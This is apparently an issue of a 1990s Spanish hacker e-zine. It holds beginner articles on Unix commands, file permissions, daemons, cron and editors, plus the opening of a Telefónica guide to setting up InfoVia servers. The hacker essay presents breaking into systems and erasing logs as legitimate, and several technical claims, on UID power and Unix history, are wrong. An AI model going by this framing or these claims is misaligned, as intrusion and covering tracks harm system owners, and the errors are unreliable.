-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Ä[ Hack basico - Mr. Aztech / "
>< TONE " / John ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


Ha pasado ya un largo tiempo desde que aparecio la convocatoria en la lista de
la rare, para formar un nuevo grupo de newbees, pues ya despues de ponernos de
acuerdo y organizarnos, he aqui el primer fruto de nuestro esfuerzo. La
intencion de este grupo fue ir aprendiendo mas y mejor, todos unidos como
grupo y entregar articulos periodicamente a la Raregazz, originalmente
respondieron a mi llamado 13 personas, las cuales fueron aceptadas, pero por
motivos fuera de mi control solo quedamos ocho personas, bueno esta es la
primera edicion de nuestros articulos, esperemos que les gusten y cualquier
aclaracion, duda, comentario, etc. por favor dirijanlas a esta direccion
mr_aztech@informaticosmix.com

A estaba pasando, tenemos pensado hacerle un guequito a todos los mails de
preguntas o aclaraciones que nos lleguen, para responderlos y ponerlos en
ediciones posteriores de estos articulos, bueno ahora si vamos a lo que nos
truje, gracias a la rare y en especial a GuyBrush, Acidgum y HuiLo por todo el
apoyo que dieron para la elaboracion de este articulo (Y un bu!! para Conde
Vampiro que ni nos pelo!)

Los contenidos que trataremos de abordar seran los siguientes, pero claro
explicados perfectamente y sin tecnisismos, o eso se tratara ;->

1.1 ¨Que es un Hacker? Definicion Mr. Aztech
1.2 Que es y como se maneja un servidor (General) Mr. Aztech
1.3 Comandos Basicos de Unix "
>< TONE "
1.4 Que son los Daemons John
1.5 Introduccion a el filtro Vi John
*Hasta aqui llega la primera edicion

Los contenidos de la segunda edicion vendran luego, pero ya estan confirmados
los siguientes temas:

2.1 Permisos de los archivos
2.2 Manual de Filtros

Pos como ven hemos hablado de todo menos de hacking, bueno esto es por que
primero queremos sentar bien las bases del hacking para luego entrar de lleno
en esto, posiblemente se empieze en la tercera edicion.

*No se aceptaran mas miembros en el grupo por causas de seguridad interna y
nacional

Buno ya despues de todo el rollo este, pasamos ya a los primeros articulos,
pero recuerden enviarnos todas sus dudas a nuestro correo para resolverselas y
publicarlas para todos los que tengan la misma duda.

Mr. AZTECh


*****************************************************************************
*****************************************************************************
********************** QUE ES UN HACKER....? *****************************
********************** POR MR. AZTECh *****************************
*****************************************************************************
*****************************************************************************

Bueno, no voy a explicar demasiado que es un hacker, puesto que si estas
buscando informacion hacker es por que se supone que sabes quienes son y que
es lo que hacen (Si viste la pelicula Hackers, olvida todo eso y empezemos de
nuevo).

Un hacker es una persona que tiene un conocimiento elevado sobre sistemas
computacionales en general, diganse redes, protocolos de comunicacion,
sistemas operativos, comunicaciones, telefonia, etc.. Lo que hacen los hackers
es introducirse a sistemas, mediante fallos en la configuracion, pero no con
el fin de destrozar el sistema o de sacar provecho de cualquier tipo, el unico
provecho que un verdadero hacker puede sacar de los sistemas a los que entra
es el de elevar sus conocimientos, las personas que buscan algun provecho al
entrar a un sistema, o de plano solo buscan destrozarlo se les conoce como
crackers, es por estas peronas que existen leyes contra delitos informaticos,
puesto que el hacker busca no dejar huella de su entrada a un sistema, los
unicos archivos que un hacker puede modificar son los logs, que son archivos
que guardan info. De cada usuario que se conecta a un determinado sistema,
pues a grandes rasgos esta es la definicion general de un hacker.

Mr. AZTECh



*****************************************************************************
*****************************************************************************
******************* QUE ES UN SERVIDOR ? **************************
******************* POR MR. AZTECH **************************
*****************************************************************************
*****************************************************************************

Bueno ahora que ya sabemos que es un hacker, debemos saber que es lo que hace;
basiente se introduce a sistemas (computadoras) y obtiene superusuario (root)
para tener el control total del sistema. Antes de todo debemos definir que es
un sistema , un sistema es una computadora que esta o no canectada a una red
(internet, LAN, WAN, Intranet, Novel) o a varias redes ( Lo mismo pero de dos
a mas), debe tener la capacidad de atender a varios usuarios a la vez (Un
sistema puede ser tu PC, conectada a internet pero con un sistema Operativo
Multiusuario (Unix, Linux, Windows NT)) y ademas tiene la capacidad de
realizar varias tareas a la vez, un ejemplo de sistema es el de una pagina web,
puesto que la computadora en que esta guardada la pagina tiene la capacidad de
atender a varios usuarios que soliciten esa misma pagina (Si tu vecino esta
viendo una pagina, tu la puedes ver en otra PC al mismo tiempo, el servidor
atiende a los dos llamados al mismo tiempo.)

Las tareas un sistema (servidor) estan divididas por puertos. Por ejemplo
el puerto 25 se dedica exclusivamente a enviar mail, esto es comparable al
puerto de impresion de tu PC (LTP1) solo que en el caso de servidores,
generalmente son porgramas (software) y no hardware como la Smart Drive que se
encarga de imprimir en tu PC.

Las personas que tienen acceso permitido a un sistema se denominan usuarios,
la manera de como un servidor reconoce quien tiene y quien no tiene permitido
la entrada a el, es mediante la combinacion de dos palabras, el LOGIN y la
CONTRASENA, esta informacion en las maquinas con Unix/Linux es guardada en el
archivo /etc/passwd generalmente, aunque varia de version a version.

El hacker puede entrar a un sistema basicamente de dos formas, la primera a
partir de una combinacion valida de LOGIN y PASSWDORD y la segunada
aprovechando errores del sistema operativo o configuracion y ganando acceso
sin tener que obtener un LOGIN y PASSWORD.

Hasta aqui pareceria facil entrar a algun sistema, pues si conoces a alguien
de ese sistema le podrias decir que te mandara el archivo passwd, para tener
todos los logins y passwds, pero no es asi por que el sistema de archivos esta
protegido con el sistema de encripcion DES, este consiste en que el passwd que
se le asigna a un usuario se encrypta con este sistema, y la palabra
resultante se le encrypta otras 25 veces con este mismo sistema y a la palabra
resultante y a la palabra resultante (mas bien signos) se le agregan dos
caracteres mas dependiendo de la fecha y la hora, asi que este proceso es
irreversible (ONE-WAY ENCRYPTION ) asi que cuando los usuarios dan su login y
password, para entrar a un sistema, este no desencripta la palabra del archivo
passwd, sino que la palabra dada por el usuario la encripta y la compara con
la archivada.

Por ultimo los usuarios de un servidor esta organizados por grupos (grupo
financiero, estudiantes, jardineros, etc), en un sistema multiusuario esta
claro que debe haber cierta privacidad (si yo hago un doc, no me gustaria que
todos lo vieran), los usuarios a su vez se organizan individualmente por su
UID y por grupos con la GID mientras este numero sea mayor, mayor sera su
poder en el sistema. Asi el usuario Root (Super ususraio) tendra uid 0 o 1.
UID=User ID
GID=Group ID

#########################################################################
### Comandos Basicos de Unix {{{{{{{{-------}}}}}}}} por ^[]xt0ne[]^ ###
#########################################################################

Un sistema operativo es un programa ke se encarga de manejar el hardware y
software del PC a beneficio del usuario. Los sistemas operativos fueron
dise¤ados para realizar tareas de hardware repetitivas etc etc etc, creo ke ya
han oido mucho de eso pero keria empezar asi =) de lo ke si les hablare antes
es de ke es unix y algo de su historia, sera breve. La historia empieza a
finales de los 70, momento en ke tuvo lugar un proyecto concertado para
desarrollar nuevas tecnicas de sistemas operativos. En 1968 un grupo de
investigadores de General Electric, AT&T Bell y del Instituto Tecnologico de
Masachussets, realizo un proyecto especial de investigacion de sistemas
operativos llamado Multics, Multics incorporo muchos conceptos nuevos de
multitarea. En 1969, Ken Thompson de AT&T Bell Laboratories, desarrollo el
sistema operativo Unix, incluyendo en el muchas de las caracteristicas del
proyecto de investigacion Multics, Thompson adapto el sistema a las
nesecidades de un entorno de investigacion dise¤andolo para ke se pudiera
ejecutar en minicomputadoras.
Bueno hay mas de esa historia pero seria muy tedioso relatarla ademas de ke lo
ke nos interesa ahora mismo es conocer algunos comandos basicos de Unix, asi
ke aca estan los mas importantes:


#########################Opciones y argumentos##########################

Una opcion es un codigo consistente en una letra precedida por un guion ke
modifica la accion ke efectuara la orden

ej: ls -l

ls visualiza todos los archivos ke hay en el directorio actual la opcion -l
modificara su tarea y mostrara un linea de informacion de cada archivo como
son el tama¤o y la fecha y hora en ke fue por ultima vez modificado ademas de
los permisos ke este tiene.

Estos son otros argumentos ke se pueden utilizar con ls:
-a presenta una lista de los archivos de un directorio incluyendo los archivos
ocultos.
-F muestra los nombres de directorios precedidos por una barra para una mejor
identificacion de estos.
-R lista el directorio actual con sus subdirectorios

Se pueden hacer combinaciones ls -al etc....


#######################Comandos comunes ########################

($ o # definen ke tipo de usuario eres si es $ tu status es de usuario si es #
eres superusuario o root)

ls : lista archivos
ej = $ ls nombre_archivo

cp : copia archivos
ej = $ cp nombre_archivo /home/user (donde /home/user son el directorio y
subdirectorio respectivamente )
( en el cual sera copiado el archivo )
rm : borra archivos
ej = $ rm nombre_archivo

mv : sirve para mover o renombrar archivos
ej = $mv nombre_archivo /home/user (eso en caso de mover el archivo a el
directorio rekerido)
ej = $mv nombre_archivo 2nombre_archivo (esto en caso de kerer renombrar el
archivo)

cd : igual ke en DOS permite acceder a un directorio
ej = $ cd nombre_directorio

mkdir : crea un directorio
ej = $mkdir nombre_directorio

rmdir : elimina un directorio
ej = $rmdir nombre_directorio

cat : filtro utilizado para mostrar el contenido de archivos
ej = $cat /home/user/nombre_archivo

more : visualiza un archivo pantalla por pantalla
ej = $more nombre_archivo

pwd : presenta el nombre de via completo del directorio en ke te encuentras
ej = $ pwd
/home/user
$_

find : permite efectuar una buskeda de archivos
ej = $ find nombre_archivo (esto busca el archivo en el directorio actual)
ej = $ find nombre_archivo / (buscar el archivo en todo el disco duro)


#################Operaciones de administracion de archivos ################

Unix proporciona varias utilidades para el manejo de sus archivos y
directorios, tambien puede controlar el acceso a sus archivos, cada archivo de
unix tiene definido una serie de permisos ke determinan kienes tiene acceso a
el, asi como el tipo de acceso ke puedan tener.

Como ya dijimos antes ls -l nos permita visualizar los permisos de determinado
archivo o directorio con el comando chmod podemos modificar esos permisos.

ej = $ ls -l datos
-rw-r--r-x 1 juan wheater 207 Feb 15 11:30 datos
|| | | | | |
|| | | | | |
tipo |de archivo | | nombre del ar|chivo en b|ytes
| | | | |
permisos nombre de| dueño | nombre del archivo
| fecha y hora de la ultima actualizacion
nombre del grupo

En ese ejemplo vemos los datos de un archivo en caso de ke datos fuera un
directorio su tipo seria d y se veria drw-r--r-x.
Los permisos se dividen como ya vimos en 10 casillas de las cuales la primera
indica si es un archivo o si es un directorio las tres siguiente ekivalen a
los permisos del due¤o del archivo o directorio las tres ke siguen equivalen a
los permisos del grupo y las tres ultimas a los permisos de los demas usuarios
Asi estan distribuidos los permisos :
del due¤o del grupo de otros rwx rwx rwx rw- rw- r--

donde r equivale al permiso de lectura
w permiso de escritura
x permiso de ejecucion


Estos permisos pueden ser modificados utilizando la orden chmod , para su uso
se han especificado las categorias de cada usuarios asi: u para el due¤o, g
para el grupo y o para otros usuarios.
ej = $chmod g+rw datos (esto le a¤ade permisos de escritura y lectura a datos
para el grupo)
ej = $chmod o-x datos (en este caso se le kita el permiso de ejecucion a los
otros usuarios del archivo datos)
ej = $chmod u+r-wx (aqui se le da permiso de lectura al due¤o pero de igual
modo se le kitan los permisos de lectura y escritura)
ej = $chmod a+r (este le da permiso de lectura a todos tanto a el due¤o como
al grupo y a los demas usuarios)
ej = $chmod +r (hace lo mismo ke la anterior le da el permiso de lectura a
todos)

Como ves se puede jugar con los permisos es simplemente cuestion de hacer
combinaciones y usar la imaginacion, se pueden tambien modificar los permisos
de un directorio simplemente se especifica al final el nombre del directorio.


Bueno por ahora la dejo alli mas adelante se profundisara con los permisos,
hablando de los permisos absolutos.

~~~~~~~~~~~~~~~~~~~
DAEMONS Y DRAGONES
~~~~~~~~~~~~~~~~~~~

Los demonios son procesos que no estan conectados a un terminal; pueden
ejecutarse en modo subordinado y realizan trabajo util.

El integrador de impresion es un ejemplo de DAEMON, es decir, un programa que
se ejecuta en el plano secundario y que proporciona un servicio de interes
general. Unix posee cierto numero de programas de este tipo. Algunos daemons
arrancan de manera automatica cuando alguien inicializa el sistema, y siempre
estan disponibles. Otros permanecen inactivos la mayor parte del tiempo,
despertando a intervalos predefinidos o en respuesta a algun SUCESO.

Los daemons ejecutan todo tipo de funciones para lograr que el sistema opere
optimamente: manejan la memoria, controlan los trabajos de impresion, envian y
reciben correo, ejecutan comandos en tiempos especificos, responden a
peticiones remotas con finger, etcetera.

El daemon integrador de la impresion se llama lpd. El daemon de finger se
llama fingerd. El daemon mas comun es sendmail.

Las comunicaciones del sistema UNIX a traves de uucp implican a varios
demonios: uucico maneja la planificacion y administracion de los trabajos
uucp, comprobando si existe algun trabajo para ejecutar, seleccionando un
dispositivo, estableciendo la conexion, ejecutando el trabajo y actualizando
el archivo de registro; uuxqt controla la ejecucion remota de ordenes.
Demonios similares manejan la impresion y el funcionamiento del spool de
impresora, la copia de seguridad de archivos. la limpieza de directorios
temporales y las operaciones de facturacion. Cada uno de estos demonios esta
controlado por cron, que es asimismo ejecutado por init (PID 1).
*--------------------------------------------------------------------------*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Que significa ... Daemons, dragones
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Aunque el nombre se pronuncia 'dii-mon', la forma correcta de escritura es
daemon. No se sabe si el ser un acronimo o por que existe una variante de su
escritura en Inglaterra. (En la mitologia Celta, un daemon es, por lo general,
un espiritu o inspiracion, bueno o neutral. Sin embargo, un Demon [demonio en
espa¤ol] siempre es una entidad maligna.)

Tal vez usted lea en alguna parte que el nombre significa "
monitor de disco y
ejecucion" (Disk and Executing Monitor), termino derivado de las antiguas
computadoras DEC 10 y 20. Sin embargo esta explicacion se formulo despues del
hecho.

Los programadores del MIT (Massachusetts Institute of Technology) que
trabajaron en CTSS (Sistema Compatible de Tiempo Compartido, El CTSS tenia una
libreria llamada "
runcom"", que ejecutaba una lista de comandos almacenados en
un archivo), desarrollado en 1963 usaron primero el nombre Daemon. Los
acu¤aron para lo que otros programadores denominaron DRAGONES (cabe se¤alar
que estos trabajaban en el ITS [Sistema Incompatible de Tiempo Compartido]).

CTSS e ITS son ancestros de Unix. ITS fue un sistema operativo importante,
aunque extra¤o, con un sequito de adoradores en el MIT. Hoy en dia, ITS aun es
reverenciado entre hackers ancestrales de la Costa Este de Estados Unidos.

En terminos precisos, un dragon es un daemon que no se invoca explicitamente
pero esta ahi, esperando en el plano secundario para ejecutar un trabajo. El
daemon por ejemplo, podria considerarse un dragon.
*---------------------------------------------------------------------------*
~~~~~~~~~~~~~~~~
El demonio Cron
~~~~~~~~~~~~~~~~

Cron es un demonio de sistema que ejecuta ordenes en instantes especificos. La
informacion de ordenes y de planificacion estan mantenidas en el directorio:
/var/spool/cron/crontabs en SVR4,
o en
/usr/spool/cron/crontabs en los sistemas anteriores a SVR4.

Cada usuario que esta titulado para planificar directamente ordenes con cron
tiene un archivo crontab. cron despierta periodicamente (generalmente una vez
cada minuto) y ejecuta los trabajos que estan planificados para ese minuto.

Las entradas en un archivo crontab tienen seis campos:

El primer campo es el minuto en que la orden va a ejecutarse.
El segundo campo es la hora.
El tercero, el dia del mes.
El cuarto, el mes del a¤o.
el quinto, el dia de la semana.
y el sexto, la cadena de orden a ejecutar.
Los asteriscos actuan como comodines.
En el ejemplo crontab se ejecuta el programa con nombre de camino
/var/cron/log y se envia por correo a "root" todos los
dias a las 8 P.M. El programa /home/john/bin/backup se ejecuta todos los
dias a las 2:30 A.M.

#
#
# MIN HOUR DCM MOY DOW COMMAND
#
# (0-59) (0-23) (1-31) (1-12) (0-6) (Note: 0=Sun)
# ------ ------- ------- ------- ------ --------------
#
0 18 * * * /var/cron/log mail root
30 2 * * * /home/john/bin/backup


El archivo/etc/cron.d/cron.allow

  
contiene la lista de todos los usuarios que
tienen permitido realizar entradas en la crontab. Si se es administrador del
sistema, o si este es su propio sistema, se tendra capacidad para modificar
los archivos crontab. Si no se tiene permitido modificar un archivo crontab,
se puede usar la orden at para planificar los trabajos.

~~~~~~~~~~~~~~~~
La orden crontab
~~~~~~~~~~~~~~~~

Para a¤adir algo al archivo crontab, se puede usar la orden crontab. Por
ejemplo, puede planificarse la supresion de archivos antiguos en la papelera
con una entrada como esta:
0 1 0 cd/home/john/wastebasket; find . -atime+7 -exec /bin/rm-r { } 2>
/dev/null;

Traduccion : cada domingo a la 1 A.M., ir al directorio wastebasket de john y
suprimir todos los archivos que tengan una antiguedad de mas de siete dias. Si
se coloca esta linea en un archivo de nombre viejos y se ejecuta la orden:
$crontab viejos

la linea se colocara en el archivo crontab. Si se usa crontab sin especificar
un archivo, la entrada estandar sera la que se coloque en el archivo crontab.
La orden:
$ crontab
CTRL - D

borra los contenidos de crontab, es decir, reemplaza los contenidos con
nada :).

En resumen los daemons son programas residentes en memoria, ademas nadie es el
due¤o y pueden ser lanzados por el sistema o por un usuarios permitidos.

John Jairo</td><TD width=40 nowrap><BR></TD></table>

~~~~~~~~~~~~~~~~~~~~~
Cual editor debo usar
~~~~~~~~~~~~~~~~~~~~~

Si eres usuario de Unix, tienes que aprender a usar un editor (es una
obligacion). Las tres opciones principales son vi, emacs y pico. Los primeros
son programas llenos de caracteristicas o comandos, muy poderosos, cuyo
aprendizaje exige tiempo. pico es un programa sencillo y mucho menos poderoso
que se puede aprender con rapidez; viene con el programa de correo pine.
Aunque no use pine para leer y enviar correo, puede usar pico como editor en
el trabajo cotidiano.

Cual editor debo usar? Es aconsejable que use vi o emacs (la decision es suya),
y deje que pico sea usado por "usuarios comunes".

Pico se dise¤o para ser sencillo, tanto que puede usarlo de inmediato con poco
entrenamiento o ayuda. Por desgracia, dado que es muy sencillo, pico es tan
poco creativo, es frustrante hasta la locura.

El espiritu de Unix se inclina por el uso de herramientas poderosas, dise¤adas
con logica: herramientas que le ayuden a pensar, innovar y hacer el trabajo
encomendado con elegancia y con minimo desorden. vi y emacs son programas de
este tipo. pico, por su parte, ocasiona mutaciones permanentes en el cerebro.

Esto no significa que nadie deba usar pico (y otras herramientas parecidas;
por ejemplo, el programa de correo pine). En lo absoluto. Pero si usted es del
tipo de personas con la inteligencia suficiente como para aprender Unix, lo
mas conveniente es que use vi o emacs.

Despues de todo, son muchas las personas comunes que al usar pico, pueden
llevar vidas utiles y productivas (simples usuarios).

Si preguntara a expertos que usan Unix cual editor emplean (pues todo usuario
con experiencia en Unix usa algun editor), descubrira que las preferencias se
dividen entre vi y emacs.

El vi, es un editor disponible en todo sistema Unix y que funciona muy bien.
Ademas, es una herramienta estandar. No ha cambiado en a¤os . emacs tambien es
adecuado, pero no siempre esta disponible. Es recomendable que primero
aprenda a usar vi, a menos que tenga una razon poderosa para no hacerlo.
Siempre existe la posibilidad de aprender emacs en el futuro.

Si esta aprendiendo vi y se siente temporalmente abatido, descansa, tomate
una pausa e intente trabajar con emacs. Te parecera tan complejo e imposible
que, con seguridad, sentiras deseos de volver a vi.

John Jairo</td><TD width=40 nowrap><BR></TD></table>


***Esto es todo por la primera edicon esperamos todas sus dudas o sugerencias
de temas que quizieran que se trataran en estos articulos, hasta la proxima...
Mr. AZTECh


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Ä[ Guia de instalacion de CPI's - Unamed Person ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


--== GUIA DE INSTALACION DE CENTROS PROVEEDORES DE INFORMACION ==--

___...---===
Recopilado en la compa¤ia de Telefonos
===---...___

Author: Unamed Person
Date: 4/09/98

DISCLAIMER: Este texto se expone UNICAMENTE para fines educativos y/o de
investigacion. El autor no se hace responsable de los posibles da¤os que se
pudiera producir la incorrecta utilizacion del texto.

Other: Todo lo aqui comentado esta pensado para configuraciones minimas,
se recomineda utilizar las herramientas mas potentes existentes en el momento
de llevar a cabo las configuraciones.


Indice de Contenidos...........................................i

1 INTRODUCCION
1.1 OBJETIVO
1.2 CONCEPTOS RELACIONADOS

2 DESCRIPCION DE LOS CENTROS PROVEEDORES DE INFORMACION
2.1 CPI ACCESIBLE SOLO DESDE Internet
2.2 CPI ACCESIBLE SOLO DESDE InfoVia
2.3 CPI ACCESIBLE DESDE InfoVia E Internet
2.4 CPI PARA EL ACCESO A Internet DESDE InfoVia

3 ARQUITECTURA DE UN CPI

4 EJEMPLO DE CONFIGURACION DE UN CPI SOBRE SUN SPARC
4.1 CONFIGURACION DE LA MAQUINA UNIX
4.1.1 Configuracion de direcciones, interfaces y rutas
4.1.1.1 Fichero /etc/hosts
4.1.1.2 Fichero /etc/nodename
4.1.1.3 Fichero /etc/hostname.le0
4.1.1.4 Fichero /etc/hostname.le0:1
4.1.1.5 Fichero /etc/netmasks
4.1.1.6 Fichero /etc/defaultrouter
4.1.1.7 Fichero /etc/rc2.d/S72inetsvc
4.1.2 Configuracion del servidor de web
4.1.2.1 Fichero httpd.conf
4.1.2.2 Fichero access.conf
4.1.2.3 Fichero srm.conf
4.1.3 Configuracion del servidor de RADIUS
4.1.3.1 Fichero cfg_local_INFOVIA
4.1.3.2 Fichero clientes_INFOVIA
4.1.3.3 Fichero usuarios_INFOVIA
4.1.4 Configuracion del servidor DNS
4.1.4.1 Fichero /etc/named.boot
4.1.4.2 Fichero /var/named/db.cpi.telefonica.es
4.1.4.3 Fichero /var/named/db.194.179.42
4.1.4.4 Fichero /var/named/db.10
4.1.4.5 Fichero /var/named/db.127.0.0
4.2 CONFIGURACION DEL ``ROUTER''
4.3 CONCLUSIONES

5 EJEMPLO DE CONFIGURACION DE UN CPI SOBRE PC CON SISTEMA OPERATIVO
LINUX
5.1 CONFIGURACION DE LA MAQUINA LINUX
5.1.1 Instalacion de las dos tarjetas Ethernet
5.1.2 Configuracion de direcciones, interfaces y rutas
5.1.2.1 Configuracion de la interfaz Internet (eth0)
5.1.2.2 Configuracion de la Interfaz InfoVia (eth1)
5.1.3 Configuracion del servidor de web
5.1.4 Configuracion del servidor de RADIUS
5.1.5 Configuracion del servidor DNS
5.2 CONFIGURACION DEL ``ROUTER''
5.3 CONCLUSIONES

6 EJEMPLO DE CONFIGURACION DE UN CPI SOBRE UNA MAQUINA CON DIGITAL
UNIX
6.1 CONFIGURACION DE LA MAQUINA DIGITAL UNIX
6.1.1 Configuracion de direcciones, interfaces y rutas
6.1.1.1 Fichero /etc/hosts
6.1.1.2 Fichero /etc/rc.config
6.1.1.3 Nombre de la maquina
6.1.2 Configuracion del servidor de web
6.1.2.1 Fichero /usr/ns-home/httpd-443.192.168.2.7/config/magnus.conf
6.1.2.2 Fichero /usr/ns-home/httpd-443.192.168.2.7/config/obj.conf
6.1.2.3 Fichero /usr/ns-home/httpd-80.10.128.2.7/config/magnus.conf
6.1.2.4 Fichero /usr/ns-home/httpd-80.10.128.2.7/config/obj.conf
6.1.3 Configuracion del servidor RADIUS
6.1.4 Configuracion del servidor DNS
6.2 CONFIGURACION DEL ``ROUTER''
6.3 CONCLUSIONES

7 INFORMACION ADICIONAL PARA LA INSTALACION DE UN CPI

8 PROCESO ADMINISTRATIVO

Glosario


1 INTRODUCCION
============

En el presente documento se propone una solucion unica para Centros
Proveedores de Informacion (CPI). Esta solucion es valida para CPIs conectados
a Internet o a InfoVia, e incluso para CPIs conectados tanto a InfoVia como a
Internet. Se ha buscado una solucion que sea valida para cualquier tipo de CPI.
Esta solucion se basa en una unica arquitectura, la cual, se caracteriza por
el reducido equipamiento que necesita. De este modo se simplifica y abarata la
construccion de un CPI.

1.1 OBJETIVO
--------

En este documento se explica una solucion global para la construccion de
centros proveedores de informacion. Esta solucion es valida para cualquier
tipo de CPI: los conectados solo a InfoVia o a Internet, asi como los
conectados tanto a InfoVia como a Internet.

La estructura de este documento es la siguiente:

. Capitulo 1: Introduccion.

Presenta una introduccion al resto del documento. Tambien incluye una
explicacion de los conceptos relacionados con los CPIs. Por ultimo se adjunta
una relacion de la bibliografia utilizada.

. Capitulo 2: Descripcion de los centros proveedores de informacion.

En este capitulo se presentan los distintos tipos de centros proveedores de
informacion, cuya integracion en una unica arquitectura es el objetivo del
presente documento.

. Capitulo 3: Arquitectura de un CPI.

Se explica en detalle la arquitectura propuesta para un CPI.

. Capitulo 4: Ejemplo de configuracion de un CPI sobre SUN SPARC.

Se presenta un ejemplo de como habria que configurar un CPI de acuerdo con la
arquitectura presentada en el capitulo anterior. Para el ejemplo se ha elegido
un CPI que sea accesible tanto desde InfoVia como desde Internet, con pasarela
a Internet desde InfoVia. En este ejemplo se emplea una maquina UNIX de SUN
Microsystems y un servidor web NCSA.

. Capitulo 5: Ejemplo de configuracion de un CPI sobre PC con Linux.

En este capitulo se explica como habria que configurar un CPI de acuerdo con
la arquitectura presentada en el capitulo tres. Para el ejemplo se ha elegido
un CPI accesible tanto desde InfoVia como desde Internet, con pasarela a
Internet desde InfoVia. En este ejemplo se emplea un PC con sistema operativo
Linux, y un servidor web NCSA.

. Capitulo 6: Ejemplo de configuracion de un CPI sobre una maquina con
sistema operativo DIGITAL UNIX.

Se desarrolla un ejemplo de como configurar un CPI segun la arquitectura
presentada en el capitulo tres. Para el ejemplo se ha tomado un CPI accesible
tanto desde InfoVia como desde Internet, con pasarela a Internet desde InfoVia.
En el ejemplo se emplea una maquina con el sistema operativo Digital Unix 3.2C,
y un servidor web NCSA.

. Capitulo 7: Informacion adicional para la instalacion de un CPI.

Se informa que el codigo de un servidor RADIUS, compilado para diferentes
plataformas, esta disponible en un servidor ftp anonimo.

. Capitulo 8: Proceso administrativo.

Se detallan los aspectos administrativos que un proveedor de informacion
debera de realizar para establecer un CPI.


1.2 CONCEPTOS RELACIONADOS
----------------------

. InfoVia es una red que permite el acceso a los usuarios a centros proveedores
de informacion bien a traves de la red telefonica basica (RTB), de la RDSI o
GSM. InfoVia multiplexa y demultiplexa el trafico procedente de los usuarios a
los diferentes centros proveedorees de informacion. Los CPIs se conectaran a
los Centros de Servicio InfoVia (CSIV) a traves de enlaces frame relay.

. Centro Proveedor de Informacion (CPI), expresion con la que se designa al
conjunto de equipos que proporcionan informacion al usuario. La informacion de
un CPI podra ser accesible desde InfoVia o desde Internet. Tambien puede ser
accesible desde InfoVia e Internet. Existe una ultima opcion de CPI que es la
de ``pasarela'' a Internet: se trata de un centro accesible desde InfoVia que
permite a los usuarios autorizados el acceso a Internet.

. Centro de Servicio InfoVia (CSIV), con este nombre se denomina al conjunto
de equipos que ofrecen la funcionalidad InfoVia al usuario de una zona
geografica concreta. Es decir, el servicio ofrecido por InfoVia se encuentra
distribuido en varios centros repartidos por el territorio nacional en funcion
de la demanda y utilizacion del servicio. En general se usara el termino
InfoVia indistintamente para referirse al servicio prestado como a los equipos
(red) sobre los que se presta dicho servicio.

. Centro de Gestion de InfoVia (CGIV), es el conjunto de equipos que permiten
a Telefonica realizar la gestion de los distintos centros que soportan la
prestacion del servicio. En el documento se usara el termino Sistema de
Gestion para referenciarlo.

. El usuario llamante es la persona que realiza la llamada a un CPI a traves
de InfoVia. Para ello debera poseer un PC con la torre de comunicaciones
TCP/IP instalada, y un modem (acceso a traves de la RTB) o un adaptador de
terminal (acceso a traves de la RDSI).

. El proveedor del servicio o cliente, es la persona o entidad que desea
suministrar informacion a traves de InfoVia, de Internet, o a traves de ambas
redes.

. Frame relay, es el protocolo utilizado entre dispositivos de usuario y
equipos de red (por ejemplo nodos de conmutacion). Es un protocolo mas
eficiente que el de X.25. Este servicio se provee por tecnicas de Circuitos
Virtuales Permanentes (PVC).

. Servidor RADIUS, es un software que puede correr en una maquina de las
instalaciones del proveedor de informacion. Su mision es realizar, en
colaboracion con InfoVia, la autentificacion de los abonados suscritos al
proveedor de informacion.

. IANA, la autoridad que asigna los direcciones en Internet.

. RFCs, son los documentos oficiales de Internet.

. CIR, es un parametro de contratacion de una conexion frame relay, para cada
uno de los circuitos virtuales permanentes contratados por interfaz. Este
parametro de contratacion determina el numero minimo de bits por segundo que
la red va a ser capaz de conmutar para ese circuito virtual permanente.


2 DESCRIPCION DE LOS CENTROS PROVEEDORES DE INFORMACION
=====================================================

Existen distintos tipos de centros proveedores de informacion. En este
capitulo se describe la arquitectura y los servicios que puede soportar cada
uno de ellos.

Los tipos de CPI son los siguientes:

. CPI accesible solo desde Internet.
. CPI accesible solo desde InfoVia.
. CPI accesible desde InfoVia e Internet.
. CPI para el acceso a Internet desde InfoVia.

Estas configuraciones son optimizables. En el Capitulo 3 se indica como
hacerlo en un contexto UNIX, y en el Capitulo 4 y en el Capitulo 5 se
proponen ejemplos de CPIs configurados de acuerdo a la solucion presesentada
en el Capitulo 3. En los siguientes apartados de este capitulo se describe en
detalle cada uno de estos tipos de CPI.


2.1 CPI ACCESIBLE SOLO DESDE Internet
---------------------------------

Este CPI solo estara conectado a la red Internet. Los servicios que ofrecera a
los usuarios que accedan seran todos los que puede ofrecer Internet como son
entre otros:

. Servidor de web.
. Servidor de mail.
. Servidor de news.

Este tipo de CPI que solo es accesible desde Internet no forma parte de
InfoVia. Todas las direcciones de los equipos que integran el CPI han de estar
registradas en Internet.


2.2 CPI ACCESIBLE SOLO DESDE InfoVia
--------------------------------

Este CPI solo estara conectado a la red InfoVia. Los servicios que ofrecera a
los usuarios que accedan seran todos los que puede ofrecer Internet, dado que
la red InfoVia emplea tambien protocolos IP y las direcciones reservadas por
Internet para redes privadas (RFC 1918). Entre estos servicios esta:

. Servidor de web.
. Servidor de mail.
. Servidor de news.

En este tipo de centros, las direcciones de los equipos que lo integran las
proporciona InfoVia.


2.3 CPI ACCESIBLE DESDE InfoVia E Internet
--------------------------------------

Este CPI esta conectado a las dos redes, a InfoVia y a Internet. Una
caracteristica fundamental de este tipo de centros proveedores de informacion
es que aun cuando son accesibles desde las dos redes, no se mezclan los
accesos. Es decir, cuando un usuario acceda desde Internet, toda la
informacion solicitada se le enviara a traves de Internet. Si el acceso del
usuario es por InfoVia, toda la informacion la recibira a traves de InfoVia.
